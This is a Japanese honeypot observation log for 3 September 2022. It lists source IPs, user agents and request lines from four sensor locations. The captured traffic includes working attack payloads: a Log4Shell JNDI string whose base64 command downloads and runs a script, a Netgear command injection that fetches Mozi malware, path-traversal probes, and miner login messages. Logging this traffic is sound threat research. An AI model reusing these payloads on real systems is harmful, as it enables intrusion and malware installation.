2022/09/03 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/09/03分です。

特徴

共通

/.envへのスキャン行為

Location:JP

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
aiohttpによるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Lkx-TraversalHttpPluginによるスキャン行為
l9exploreによるスキャン行為
/.gitへのスキャン行為
85.206.160.115に関する不正通信

を確認しました。

Location:UK

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
phpMyAdminへのスキャン行為
85.206.160.115に関する不正通信
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:SG

GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ZmEuによるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為
.cssへのスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
85.206.160.115に関する不正通信

を確認しました。

他

アクセス数推移

JP：総アクセス数：68 (前日比：-140)
US：総アクセス数：78 (前日比：-137)
UK：総アクセス数：50 (前日比：-18)
SG：総アクセス数：128 (前日比：49)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.196.129.167	United States
1	36.110.211.2	China
1	36.110.211.3	China
1	36.110.214.195	China
1	62.233.50.179	Russia
4	94.102.49.193	United Kingdom
16	95.214.235.205	Ukraine
1	107.175.3.35	United States
9	135.125.244.48	France
9	135.125.246.189	France
1	142.93.131.56	United States
5	154.26.130.15	United States
1	159.203.18.80	United States
1	159.203.59.44	United States
1	159.223.114.180	United States
1	161.35.213.88	United States
1	167.94.138.117	United States
1	167.94.145.60	United States
1	172.105.77.209	United States
1	180.149.125.162	Mongolia
1	185.220.101.168	Germany
1	192.3.101.119	United States
1	192.241.220.43	United States
5	193.32.126.159	Sweden
1	198.235.24.25	United States
1	198.235.24.152	United States

UserAgent一覧

件数	UserAgent
7	`-`
2	`Go-http-client/1.1`
6	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
5	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1`
36	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 zgrab/0.x`
1	`Python/3.7 aiohttp/3.7.4.post0`
2	`Wget/1.21`
1	`curl/7.29.0`
1	t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//159[.]203[.]59[.]44:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzEzNS4xNDguMTA0LjI0MToxOTgwL2FrdHVhbGlzaWVyZW4uc2ggLW8gYWt0dWFsaXNpZXJlbi5zaDsgd2dldCBodHRwOi8vMTM1LjE0OC4xMDQuMjQxOjE5ODAvYWt0dWFsaXNpZXJlbi5zaDsgY2htb2QgNzc3IGFrdHVhbGlzaWVyZW4uc2g7IHNoIGFrdHVhbGlzaWVyZW4uc2g7IHJtIC1yZiBha3R1YWxpc2llcmVuLnNoOyBybSAtcmYgYWt0dWFsaXNpZXJlbi5zaC4xOyBybSAtcmYgS29iYWx0Lio=}')

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x03`
2		`\x16\x03\x01`
40	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/?id=`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
2	GET	`/_profiler/phpinfo`	HTTP/1.1
2	GET	`/config.json`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/mysql/scripts/setup.php`	HTTP/1.1
1	GET	`/phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`/pma/scripts/setup.php`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/stalker_portal/server/tools/auth_simple.php`	HTTP/1.1
1	GET	`/wp-login.php`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	20.86.7.226	United States
19	54.37.79.75	France
1	62.233.50.179	Russia
1	64.62.197.86	United States
6	89.248.165.52	United Kingdom
4	94.102.49.193	United Kingdom
1	139.180.182.100	United States
1	147.182.184.92	United States
1	147.182.200.213	United States
2	152.89.196.62	Russia
12	161.35.86.181	United States
4	162.142.125.10	United States
2	167.94.138.60	United States
1	172.104.242.173	United States
1	175.100.20.208	Cambodia
2	179.43.155.171	Panama
1	180.149.125.166	Mongolia
7	185.254.196.223	Ukraine
1	188.166.232.196	United States
1	203.176.129.241	Cambodia
1	205.210.31.172	United States
2	208.67.107.247	United States
1	209.141.35.128	United States
1	209.141.41.193	United States
3	222.186.19.235	China

UserAgent一覧

件数	UserAgent
21	`-`
6	`Go-http-client/1.1`
1	`Lkx-TraversalHttpPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis)`
1	`Mozilla/5.0 (Linux; Android 11; Mi A3 Build/RKQ1.200903.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/101.0.4951.41 YaBrowser/22.1.0.194 (lite) Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
1	`Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.6 Safari/532.2`
28	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
1	`Mozilla/5.0`
7	`l9explore/1.3.0`

リクエスト内容一覧

件数	Method	Request	Protocol
4		`-`
1		`\x03`
5		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1	CONNECT	`85[.]206[.]160[.]115:80`	HTTP/1.1
1	CONNECT	`hotmail-com.olc[.]protection[.]outlook[.]com:25`	HTTP/1.1
1	CONNECT	`leakix[.]net:443`	HTTP/1.1
2	CONNECT	`www[.]google[.]com:443`	HTTP/1.1
1	GET	`/.DS_Store`	HTTP/1.1
29	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/api/geojson?url=file:///etc/hosts`	HTTP/1.1
1	GET	`/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts`	HTTP/1.1
1	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/js../.git/config`	HTTP/1.1
1	GET	`/login.action`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/stalker_portal/server/tools/auth_simple.php`	HTTP/1.1
1	GET	`/telescope/requests`	HTTP/1.1
2	GET	`http[:]//fuwu[.]sogou[.]com/404/index.html`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
3	PRI	`*`	HTTP/2.0
1	PUT	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.109.126.233	United States
1	36.110.211.67	China
1	36.110.211.69	China
1	36.110.214.194	China
1	36.110.214.195	China
1	45.95.55.245	Germany
4	66.240.236.119	United States
6	89.248.165.52	United Kingdom
2	109.237.103.9	Russia
2	109.237.103.38	Russia
1	117.195.93.187	India
1	117.201.203.167	India
1	125.43.225.84	China
6	149.5.173.16	United States
2	152.89.196.62	Russia
2	167.94.145.57	United States
2	167.94.145.60	United States
2	167.248.133.45	United States
1	180.149.125.165	Mongolia
1	184.105.247.251	United States
8	185.254.196.223	Ukraine
1	198.235.24.17	United States
1	205.185.116.89	United States
1	219.133.164.101	China

UserAgent一覧

件数	UserAgent
24	`-`
4	`Go-http-client/1.1`
1	`Hello, World`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
10	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0`
3	`Wget/1.21`
1	`curl/7.29.0`

リクエスト内容一覧

件数	Method	Request	Protocol
4		`-`
1		`\x16\x03\x01\x01C\x01`
1		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01`
1	CONNECT	`85[.]206[.]160[.]115:80`	HTTP/1.1
1	CONNECT	`google[.]com:443`	HTTP/1.1
1	CONNECT	`hotmail-com.olc[.]protection[.]outlook[.]com:25`	HTTP/1.1
12	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`//MyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`//myadmin/scripts/setup.php`	HTTP/1.1
1	GET	`//phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`//phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`//pma/scripts/setup.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/muieblackcat`	HTTP/1.1
1	GET	`/mysql/scripts/setup.php`	HTTP/1.1
1	GET	`/phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`/pma/scripts/setup.php`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//219[.]133[.]164[.]101:34750/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/stalker_portal/server/tools/auth_simple.php`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.0
3	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.196.129.167	United States
1	36.110.211.2	China
1	36.110.214.195	China
2	45.61.187.45	United States
1	45.95.55.245	Germany
10	45.148.120.127	Netherlands
5	51.79.29.48	Canada
1	51.89.158.68	France
16	54.37.79.75	France
2	62.233.50.179	Russia
1	64.225.68.42	United States
6	89.248.165.52	United Kingdom
43	104.156.155.29	United States
1	125.44.13.183	China
1	143.244.154.134	United States
1	147.182.181.147	United States
3	152.89.196.62	Russia
1	159.223.122.31	United States
9	164.52.24.190	China
2	167.94.138.46	United States
2	179.43.155.171	Panama
1	180.149.125.163	Mongolia
1	185.220.101.183	Germany
8	185.254.196.223	Ukraine
1	188.166.232.196	United States
1	192.241.214.34	United States
1	198.235.24.35	United States
1	205.210.31.28	United States
1	209.141.41.193	United States
1	216.218.206.75	United States
2	222.186.19.235	China

UserAgent一覧

件数	UserAgent
27	`-`
2	`Go-http-client/1.1`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.192 Safari/531.3`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0`
1	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
1	`Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.1 Safari/528.8`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36`
34	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)`
1	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
2	`Wget/1.21`
2	`ZmEu`
42	`curl/7.54.0`

リクエスト内容一覧

件数	Method	Request	Protocol
5		`-`
2		`\x03`
2		`\x16\x03\x01\x01`	\x01
1		`\x16\x03\x01\x02`
9		`\x16\x03\x01`
1		`{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"4A1thTgTc1XaTzgVsZsQXwWRtQnGSTZYf3MMZtGrCwbBAsqb4BrT9U46SqHJhckvN6cZgifv4ybnPU4nyqizyhhTTVxr6CC\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3`	(Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}
1		`{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"eth1.0\",\"params\":[\"0x86748973411ebddd519925ebbbfe6c9509348f21\",\"x\"],\"jsonrpc\":\"2.0\"}`
1		`{\"id\":`	1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}
1		`{\"id\":`	1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}
1	CONNECT	`85[.]206[.]160[.]115:80`	HTTP/1.1
1	CONNECT	`google[.]com:443`	HTTP/1.1
1	CONNECT	`hotmail-com.olc[.]protection[.]outlook[.]com:25`	HTTP/1.1
35	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000`	HTTP/1.1
1	GET	`/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/CSS/Miniweb.css`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/Portal/Portal.mwsl`	HTTP/1.1
1	GET	`/Portal0000.htm`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/SiteLoader`	HTTP/1.1
1	GET	`/WuEL`	HTTP/1.1
1	GET	`/__Additional`	HTTP/1.1
1	GET	`/a`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin.cgi`	HTTP/1.1
1	GET	`/admin.jsp`	HTTP/1.1
1	GET	`/admin.php`	HTTP/1.1
1	GET	`/admin.pl`	HTTP/1.1
1	GET	`/admin.shtml`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/base.cfm`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
1	GET	`/default.html`	HTTP/1.1
1	GET	`/default.pl`	HTTP/1.1
1	GET	`/default.shtml`	HTTP/1.1
1	GET	`/docs/cplugError.html/`	HTTP/1.1
1	GET	`/download/file.ext`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/home.jsa`	HTTP/1.1
1	GET	`/index.jhtml`	HTTP/1.1
1	GET	`/indice.aspx`	HTTP/1.1
1	GET	`/indice.jsa`	HTTP/1.1
1	GET	`/inicio.cgi`	HTTP/1.1
1	GET	`/js../.git/config`	HTTP/1.1
1	GET	`/localstart.aspx`	HTTP/1.1
1	GET	`/localstart.jsp`	HTTP/1.1
1	GET	`/mPlayer`	HTTP/1.1
1	GET	`/main.asp`	HTTP/1.1
1	GET	`/main.jhtml`	HTTP/1.1
1	GET	`/menu.cgi`	HTTP/1.1
1	GET	`/nmaplowercheck1662102831`	HTTP/1.1
1	GET	`/phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/pools`	HTTP/1.1
1	GET	`/readme.txt`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/stalker_portal/server/tools/auth_simple.php`	HTTP/1.1
1	GET	`/start.aspx`	HTTP/1.1
1	GET	`/start.cfm`	HTTP/1.1
1	GET	`/start.jsp`	HTTP/1.1
1	GET	`/vPMI`	HTTP/1.1
1	GET	`/w00tw00t.at.blackhats.romanian.anti-sec:)`	HTTP/1.1
2	GET	`http[:]//fuwu[.]sogou[.]com/404/index.html`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/scripts/WPnBr.dll`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	PRI	`*`	HTTP/2.0